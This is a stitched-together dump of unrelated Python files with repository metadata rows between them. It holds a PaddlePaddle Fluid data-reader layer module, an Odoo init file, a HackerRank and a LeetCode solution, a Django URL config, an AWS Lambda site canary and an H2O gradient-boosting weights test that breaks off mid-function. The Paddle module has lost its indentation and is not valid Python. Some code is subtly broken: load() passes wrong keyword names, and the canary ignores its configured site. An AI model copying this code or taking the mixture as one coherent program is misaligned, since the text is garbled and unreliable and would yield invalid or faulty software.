from ..framework import convert_np_dtype_to_dtype_, default_main_program, default_startup_program, Program
from ..unique_name import generate as unique_name
from control_flow import BlockGuard
from ..layer_helper import LayerHelper
from ..executor import global_scope
from layer_function_generator import generate_layer_fn, templatedoc
__all__ = [
'data', 'BlockGuardServ', 'ListenAndServ', 'Send', 'Recv',
'open_recordio_file', 'open_files', 'read_file', 'shuffle', 'batch',
'double_buffer', 'random_data_generator', 'Preprocessor', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This function takes in the input and based on whether data has
to be returned back as a minibatch, it creates the global variable by using
the helper functions. The global variables can be accessed by all the
following operators in the graph.
All the input variables of this function are passed in as local variables
to the LayerHelper constructor.
Args:
name(str): The name/alias of the function
shape(list): Tuple declaring the shape.
append_batch_size(bool): Whether or not to append the data as a batch.
dtype(int|float): The type of data : float32, float_16, int etc
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in xrange(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create a rpc server bind and listen
on specific TCP port, this server will run the sub-block when
received variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many client are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'sync_mode': True, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, sync=True):
"""
Send variables to the server side, and get vars from server
side when server have finished running server side program.
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(type="send_barrier", attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": get_vars},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(type="fetch_barrier", attrs={"endpoints": endpoints})
return get_vars
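# Usage sketch for Recv (hypothetical endpoint; assumes `param_var` exists):
#
#   updated_vars = Recv("127.0.0.1:6170", get_vars=[param_var])
#
# The received values are written into get_vars in place, which is also
# returned for convenience.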
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
@templatedoc(op_type='create_recordio_file_reader')
def open_recordio_file(filename,
shapes,
lod_levels,
dtypes,
pass_num=1,
for_parallel=True):
"""
${comment}
Args:
filename(${filename_type}): ${filename_comment}.
        shapes(list): List of tuples declaring the data shapes.
lod_levels(${lod_levels_type}): ${lod_levels_comment}.
        dtypes(list): List of strs declaring the data types.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
${out_comment}.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.io.open_recordio_file(
>>> filename='./data.recordio',
>>> shapes=[(3,224,224), (1)],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> # Via the reader, we can use 'read_file' layer to get data:
>>> image, label = fluid.layers.io.read_file(reader)
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('open_recordio_file')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_recordio_file_reader',
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'filename': filename,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if pass_num > 1:
main_prog_var = multi_pass(reader=main_prog_var, pass_num=pass_num)
if for_parallel:
main_prog_var = parallel(reader=main_prog_var)
return monkey_patch_reader_methods(main_prog_var)
def random_data_generator(low, high, shapes, lod_levels, for_parallel=True):
"""
Create a uniform random data generator
This layer returns a Reader Variable.
Instead of opening a file and reading data from it, this
Reader Variable generates float uniform random data by itself.
It can be used as a dummy reader to test a network without
opening a real file.
Args:
low(float): The lower bound of data's uniform distribution.
high(float): The upper bound of data's uniform distribution.
        shapes(list): List of tuples declaring the data shapes.
        lod_levels(list): List of ints declaring the data lod_level.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable from which we can get random data.
Examples:
.. code-block:: python
reader = fluid.layers.random_data_generator(
low=0.0,
high=1.0,
shapes=[[3,224,224], [1]],
lod_levels=[0, 0])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.read_file(reader)
"""
dtypes = [core.VarDesc.VarType.FP32] * len(shapes)
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('random_data_generator')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_random_data_generator',
outputs={'Out': [startup_var]},
attrs={
'low': low,
'high': high,
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if for_parallel:
main_prog_var = parallel(reader=main_prog_var)
return monkey_patch_reader_methods(main_prog_var)
def open_files(filenames,
shapes,
lod_levels,
dtypes,
thread_num=1,
buffer_size=None,
pass_num=1,
for_parallel=True):
"""
Open files
This layer takes a list of files to read from and returns a Reader Variable.
Via the Reader Variable, we can get data from given files. All files must
    have name suffixes to indicate their formats, e.g., '*.recordio'.
Args:
filenames(list): The list of file names.
        shapes(list): List of tuples declaring the data shapes.
        lod_levels(list): List of ints declaring the data lod_level.
        dtypes(list): List of strs declaring the data types.
        thread_num(int): The maximum number of concurrent prefetch threads.
buffer_size(int): The size of prefetch buffer.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable via which we can get file data.
Examples:
.. code-block:: python
reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.io.read_file(reader)
"""
if buffer_size is None:
buffer_size = thread_num
if isinstance(filenames, basestring):
filenames = [filenames]
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
multi_file_reader_name = unique_name('multi_file_reader')
startup_blk = default_startup_program().current_block()
startup_reader = startup_blk.create_var(name=multi_file_reader_name)
startup_blk.append_op(
type='open_files',
outputs={'Out': [startup_reader]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks,
'file_names': filenames,
'thread_num': thread_num,
'buffer_size': buffer_size
})
startup_reader.desc.set_dtypes(dtypes)
startup_reader.persistable = True
main_prog_reader = _copy_reader_var_(default_main_program().current_block(),
startup_reader)
if pass_num > 1:
main_prog_reader = multi_pass(
reader=main_prog_reader, pass_num=pass_num)
if for_parallel:
main_prog_reader = parallel(reader=main_prog_reader)
return monkey_patch_reader_methods(main_prog_reader)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def shuffle(reader, buffer_size):
"""
Shuffle the reader.
"""
return __create_unshared_decorated_reader__(
'create_shuffle_reader', reader, {'buffer_size': int(buffer_size)})
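# Usage sketch for shuffle (assumes `raw_reader` came from open_files or
# open_recordio_file above):
#
#   shuffled_reader = shuffle(reader=raw_reader, buffer_size=128)
#
# Instances are drawn randomly from a buffer of `buffer_size` elements, so a
# larger buffer gives a better (but more memory-hungry) shuffle.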
def batch(reader, batch_size):
"""
This layer is a reader decorator. It takes a reader and adds
    'batching' decoration on it. When reading with the resulting
    decorated reader, the output data will be automatically organized
    into batches.
Args:
reader(Variable): The reader to be decorated with 'batching'.
batch_size(int): The batch size.
Returns:
Variable: The reader which has been decorated with 'batching'.
Examples:
.. code-block:: python
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
# If we read data with the raw_reader:
# data = fluid.layers.read_file(raw_reader)
# We can only get data instance by instance.
#
# However, if we read data with the batch_reader:
# data = fluid.layers.read_file(batch_reader)
        # Each 5 adjacent instances will be automatically combined together
        # to become a batch. So what we get ('data') is a batch of data
        # instead of a single instance.
"""
return __create_unshared_decorated_reader__(
'create_batch_reader', reader, {'batch_size': int(batch_size)})
def double_buffer(reader, place=None, name=None):
"""
    Wrap a reader with double buffering. The data will be copied to the target
    place through a double-buffer queue. If the target place is None, the
    place the executor runs on will be used.
Args:
reader(Variable): the reader variable need to be wrapped.
        place(Place): the place of the target data. Defaults to the place
            the executor runs on.
name(str): Variable name. None if the user does not care.
Returns:
wrapped reader with double buffer.
Examples:
>>> reader = fluid.layers.open_files(filenames=['somefile'],
>>> shapes=[[-1, 784], [-1, 1]],
>>> dtypes=['float32', 'int64'])
>>> reader = fluid.layers.double_buffer(reader)
>>> img, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def multi_pass(reader, pass_num):
return __create_shared_decorated_reader__(
'create_multi_pass_reader', reader, {'pass_num': int(pass_num)})
def parallel(reader):
return __create_shared_decorated_reader__('create_threaded_reader', reader,
{})
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` and so on.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read via the given reader.
Examples:
.. code-block:: python
data_file = fluid.layers.open_files(
filenames=['mnist.recordio'],
shapes=[(-1, 748), (-1, 1)],
lod_levels=[0, 0],
dtypes=["float32", "int64"])
data_file = fluid.layers.double_buffer(
fluid.layers.batch(data_file, batch_size=64))
input, label = fluid.layers.read_file(data_file)
"""
helper = LayerHelper('read_file')
out = [
helper.create_tmp_variable(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
class Preprocessor(object):
"""
A block for data pre-processing in reader.
Args:
reader (Variable): A reader variable.
name (str, default None): The name of the reader.
Examples:
.. code-block:: python
preprocessor = fluid.layers.io.Preprocessor(reader=reader)
with preprocessor.block():
img, lbl = preprocessor.inputs()
img_out = img / 2
lbl_out = lbl + 1
preprocessor.outputs(img_out, lbl_out)
data_file = fluid.layers.io.double_buffer(preprocessor())
"""
BEFORE_SUB_BLOCK = 0
IN_SUB_BLOCK = 1
AFTER_SUB_BLOCK = 2
def __init__(self, reader, name=None):
self.underlying_reader = reader
new_reader_name = name if name is not None else unique_name(
"create_custom_reader")
self.main_prog = default_main_program()
self.reader = self.main_prog.current_block().create_var(
name=new_reader_name)
self.sub_block = None
self.source_var_names = None
self.sink_var_names = None
self.status = Preprocessor.BEFORE_SUB_BLOCK
def is_completed(self):
return self.sub_block and self.source_var_names and self.sink_var_names
@contextlib.contextmanager
def block(self):
self.status = Preprocessor.IN_SUB_BLOCK
self.sub_block = self.main_prog.create_block()
yield
self.main_prog.rollback()
self.status = Preprocessor.AFTER_SUB_BLOCK
if not self.is_completed():
raise RuntimeError(
"The definition of preprocessor is incompleted! "
"Please make sure that you have set input and output "
"variables by invoking 'inputs' and 'outputs' in "
"Preprocessor's sub-block.")
def inputs(self):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.inputs() can only be invoked inside the sub-block."
)
source_shapes = self.underlying_reader.desc.shapes()
source_dtypes = self.underlying_reader.desc.dtypes()
source_lod_levels = self.underlying_reader.desc.lod_levels()
self.source_var_names = [
unique_name("preprocessor_source")
for _ in xrange(len(source_shapes))
]
source_vars = []
for var_name, shape, dtype, lod_level in zip(
self.source_var_names, source_shapes, source_dtypes,
source_lod_levels):
source_vars.append(self.main_prog.current_block().create_var(
name=var_name, shape=shape, dtype=dtype, lod_level=lod_level))
return source_vars
def outputs(self, *outs):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.outputs() can only be invoked inside the sub-block."
)
self.sink_var_names = [var.name for var in outs]
def __call__(self, *args, **kwargs):
if self.status != Preprocessor.AFTER_SUB_BLOCK:
raise RuntimeError(
"Preprocessor output can only be retrieved after rnn block.")
self.main_prog.current_block().append_op(
type="create_custom_reader",
inputs={'UnderlyingReader': self.underlying_reader},
outputs={'Out': [self.reader]},
attrs={
"sub_block": self.sub_block,
"source_var_names": self.source_var_names,
"sink_var_names": self.sink_var_names
})
return monkey_patch_reader_methods(self.reader)
@templatedoc()
def load(out, file_path, load_as_fp16=None):
"""
${comment}
>>> import paddle.fluid as fluid
>>> tmp_tensor = fluid.layers.create_tensor(dtype='float32')
>>> fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
Args:
out(${out_type}): ${out_comment}.
file_path(${file_path_type}): ${file_path_comment}.
load_as_fp16(${load_as_fp16_type}): ${load_as_fp16_comment}.
Returns:
None
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, args=attrs)
| [
"[email protected]"
] | |
7d95da30e61f2d12adca17c4cdd28affa68b67dc | c7d7dfa5ac23b940e852a67155364439d9069486 | /website_form_attachment/__init__.py | 668228df411b10356d3a8de52f09395638f6ead1 | [] | no_license | shurshilov/odoo | d163f6c939bcbfb36bdf83eeeeffca368f0a4722 | 8099e62254b7f1e113be7b522585dbc352aea5a8 | refs/heads/16.0 | 2023-09-04T03:02:31.427240 | 2023-09-03T16:25:28 | 2023-09-03T16:25:28 | 89,852,559 | 20 | 43 | null | 2023-09-03T06:30:22 | 2017-04-30T13:32:08 | JavaScript | UTF-8 | Python | false | false | 126 | py | # Copyright 2019 Shurshilov Artem
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).
from . import models
| [
"[email protected]"
] | |
5a931a1392b981326d9106633ad96940ac2d9671 | 8d5337e7132ae3980bda3bc0ed811207ca79b5b7 | /search/icecreamParlour.py | a61e3f9004182b4836c1f518cb20e678620a38f0 | [] | no_license | thesharpshooter/hackerrank | 16e7c565053a4d36f0a293c0f8af631cee591424 | 2cfec286e71465edd6603f6bcee608c764a086ec | refs/heads/master | 2021-07-11T09:21:57.838631 | 2017-10-06T05:22:31 | 2017-10-06T05:22:31 | 104,779,843 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # Enter your code here. Read input from STDIN. Print output to STDOUT
def get(arr, m, n):
    """Return the 0-based indices of two flavors whose combined cost is as
    close to m as possible without exceeding it."""
    arr = sorted([[arr[i], i] for i in range(n)], key=lambda x: x[0])
i = 0
res = [None,None]
diff = float("inf")
while i < n-1 and arr[i][0] < m:
temp = m-arr[i][0]
j = i+1
while j < n and temp-arr[j][0]>=0:
if temp-arr[j][0] < diff:
diff = temp-arr[j][0]
res[0] = arr[j][1]
res[1] = arr[i][1]
if diff == 0:
break
j += 1
i += 1
return res
t = int(raw_input())
for i in range(t):
m = int(raw_input())
n = int(raw_input())
arr = map(int,raw_input().split())
res = get(arr,m,n)
print min(res)+1,max(res)+1
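# Worked example: with m=4 and arr=[1,4,5,3,2] the sorted (cost, index) pairs
# are [(1,0),(2,4),(3,3),(4,1),(5,2)]; costs 1+3 spend the budget exactly, so
# the printed 1-based indices are "1 4".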
| [
"[email protected]"
] | |
5f86e01d9b34bd9ecb0e5f8495151675c3e1367b | 10bf47e8efe8a6e2eb2e237c5634471ba461483b | /voting/urls.py | 8a998b355a2327ae6453160d9b047e40717c72e5 | [] | no_license | swciitg/IITG_General_Elections | d9d4001fa8b65feabc79284ae1df7d078e089712 | e35e29a1f91e07f3499a5613c091db28b2a07656 | refs/heads/master | 2020-05-06T15:31:00.797537 | 2019-04-08T08:02:41 | 2019-04-08T08:02:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 987 | py | """voting URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import include, url
from . import views
urlpatterns = [
# url(r'^$',views.siteindex,name="siteindex"),
url('general_elections/', include('general_elections.urls')),
url(r'^authentication/', include('authentication.urls', namespace='authentication')),
url('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
d9f83c10fa19003084ba46e89c00610f56fc49a9 | 9b4fe9c2693abc6ecc614088665cbf855971deaf | /881.boats-to-save-people.py | b1ee51a5ebe9936be3be41a07b61386d05ccc993 | [
"MIT"
] | permissive | windard/leeeeee | e795be2b9dcabfc9f32fe25794878e591a6fb2c8 | 0dd67edca4e0b0323cb5a7239f02ea46383cd15a | refs/heads/master | 2022-08-12T19:51:26.748317 | 2022-08-07T16:01:30 | 2022-08-07T16:01:30 | 222,122,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,834 | py | #
# @lc app=leetcode id=881 lang=python
#
# [881] Boats to Save People
#
# https://leetcode.com/problems/boats-to-save-people/description/
#
# algorithms
# Medium (42.90%)
# Total Accepted: 12.4K
# Total Submissions: 28.9K
# Testcase Example: '[1,2]\n3'
#
# The i-th person has weight people[i], and each boat can carry a maximum
# weight of limit.
#
# Each boat carries at most 2 people at the same time, provided the sum of the
# weight of those people is at most limit.
#
# Return the minimum number of boats to carry every given person. (It is
# guaranteed each person can be carried by a boat.)
#
#
#
#
# Example 1:
#
#
# Input: people = [1,2], limit = 3
# Output: 1
# Explanation: 1 boat (1, 2)
#
#
#
# Example 2:
#
#
# Input: people = [3,2,2,1], limit = 3
# Output: 3
# Explanation: 3 boats (1, 2), (2) and (3)
#
#
#
# Example 3:
#
#
# Input: people = [3,5,3,4], limit = 5
# Output: 4
# Explanation: 4 boats (3), (3), (4), (5)
#
# Note:
#
#
# 1 <= people.length <= 50000
# 1 <= people[i] <= limit <= 30000
#
#
#
#
#
#
class Solution(object):
def numRescueBoats(self, people, limit):
"""
:type people: List[int]
:type limit: int
:rtype: int
"""
        # With at most two people per boat this is a greedy two-pointer
        # problem; with three or more per boat it would need backtracking
        # on top of the greedy pairing.
people.sort()
first = 0
last = len(people) - 1
times = 0
while first <= last:
if last == first:
times += 1
break
if people[first] + people[last] <= limit:
times += 1
first += 1
last -= 1
elif people[first] > limit:
times += last - first
else:
times += 1
last -= 1
return times
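# Quick sanity sketch against the examples above (guarded so it never runs
# inside the LeetCode harness):
if __name__ == "__main__":
    s = Solution()
    assert s.numRescueBoats([1, 2], 3) == 1
    assert s.numRescueBoats([3, 2, 2, 1], 3) == 3
    assert s.numRescueBoats([3, 5, 3, 4], 5) == 4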
| [
"[email protected]"
] | |
84d04e0a67a92315abff10fcedcff85bbe31b3a0 | 9a819fc91e17ef9a44e45cf68e76cf696381d06d | /Lambda/canary.py | 03732e914a31ca284fdfaa6e38ee4352ac56a773 | [] | no_license | Gautam3994/Dark-Knight | aef1d6383e0785130db75e80ed40f544a120579e | 327b2d58851a42da1b707addea73e40fac6a61cc | refs/heads/master | 2022-12-01T11:58:39.857379 | 2020-09-05T18:07:51 | 2020-09-05T18:07:55 | 203,866,327 | 0 | 1 | null | 2022-11-24T09:16:18 | 2019-08-22T20:14:43 | Python | UTF-8 | Python | false | false | 598 | py | import requests
import os
import datetime
SITE = os.environ['site']
EXPECTED = os.environ['expected']
def validate(res):
return EXPECTED in res
def lambda_handler(event, context):
print(f"Test the site{SITE} at the time {event['time']}")
response = requests.get(url="https://www.amazon.in", headers={'User-Agent': 'AWS Lambda'})
try:
if not validate(response.text):
raise Exception("Validation failed")
except:
print("Check failed")
else:
print("okay")
finally:
print(f"Check complete at {str(datetime.datetime.now())}")
| [
"[email protected]"
] | |
3159b23be1a8a592afc5451129094bdd839623f7 | 34f6120035bfea1f675eb5dd98d59e81209d5c5e | /h2o-py/tests/testdir_algos/gbm/pyunit_weights_var_impGBM.py | 7ea27aa39c4127b00f5a8f9a0451c30aaf0009ea | [
"Apache-2.0"
] | permissive | Pure-Mind/h2o-3 | f5b5b0bf3d2856fee0719adf2754c1af719e5950 | 508ad0e28f40f537e906a372a2760ca6730ebe94 | refs/heads/master | 2021-01-17T22:56:02.372211 | 2015-08-09T02:52:34 | 2015-08-09T03:31:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,163 | py | import sys
sys.path.insert(1, "../../../")
import h2o
import random
def weights_var_imp(ip,port):
# Connect to h2o
h2o.init(ip,port)
def check_same(data1, data2, min_rows_scale):
gbm1_regression = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["economy"],
min_rows=5,
ntrees=5,
max_depth=2)
gbm2_regression = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["economy"],
training_frame=data2,
min_rows=5*min_rows_scale,
weights_column="weights",
ntrees=5,
max_depth=2)
gbm1_binomial = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["economy_20mpg"],
min_rows=5,
distribution="bernoulli",
ntrees=5,
max_depth=2)
gbm2_binomial = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["economy_20mpg"],
training_frame=data2,
weights_column="weights",
min_rows=5*min_rows_scale,
distribution="bernoulli",
ntrees=5,
max_depth=2)
gbm1_multinomial = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["cylinders"],
min_rows=5,
distribution="multinomial",
ntrees=5,
max_depth=2)
gbm2_multinomial = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["cylinders"],
training_frame=data2,
weights_column="weights",
min_rows=5*min_rows_scale,
distribution="multinomial",
ntrees=5,
max_depth=2)
reg1_vi = gbm1_regression.varimp(return_list=True)
reg2_vi = gbm2_regression.varimp(return_list=True)
bin1_vi = gbm1_binomial.varimp(return_list=True)
bin2_vi = gbm2_binomial.varimp(return_list=True)
mul1_vi = gbm1_multinomial.varimp(return_list=True)
mul2_vi = gbm2_multinomial.varimp(return_list=True)
print "Varimp (regresson) no weights vs. weights: {0}, {1}".format(reg1_vi, reg2_vi)
print "Varimp (binomial) no weights vs. weights: {0}, {1}".format(bin1_vi, bin2_vi)
print "Varimp (multinomial) no weights vs. weights: {0}, {1}".format(mul1_vi, mul2_vi)
        for rvi1, rvi2 in zip(reg1_vi, reg2_vi): assert rvi1 == rvi2, "Expected vi's (regression) to be the same, but got {0}, and {1}".format(rvi1, rvi2)
        for bvi1, bvi2 in zip(bin1_vi, bin2_vi): assert bvi1 == bvi2, "Expected vi's (binomial) to be the same, but got {0}, and {1}".format(bvi1, bvi2)
        for mvi1, mvi2 in zip(mul1_vi, mul2_vi): assert mvi1 == mvi2, "Expected vi's (multinomial) to be the same, but got {0}, and {1}".format(mvi1, mvi2)
h2o_cars_data = h2o.import_frame(h2o.locate("smalldata/junit/cars_20mpg.csv"))
h2o_cars_data["economy_20mpg"] = h2o_cars_data["economy_20mpg"].asfactor()
h2o_cars_data["cylinders"] = h2o_cars_data["cylinders"].asfactor()
# uniform weights same as no weights
weight = random.randint(1,10)
uniform_weights = [[weight] for r in range(406)]
h2o_uniform_weights = h2o.H2OFrame(python_obj=uniform_weights)
h2o_uniform_weights.setNames(["weights"])
h2o_data_uniform_weights = h2o_cars_data.cbind(h2o_uniform_weights)
print "\n\nChecking that using uniform weights is equivalent to no weights:"
check_same(h2o_cars_data, h2o_data_uniform_weights, weight)
# zero weights same as removed observations
zero_weights = [[0] if random.randint(0,1) else [1] for r in range(406)]
h2o_zero_weights = h2o.H2OFrame(python_obj=zero_weights)
h2o_zero_weights.setNames(["weights"])
h2o_data_zero_weights = h2o_cars_data.cbind(h2o_zero_weights)
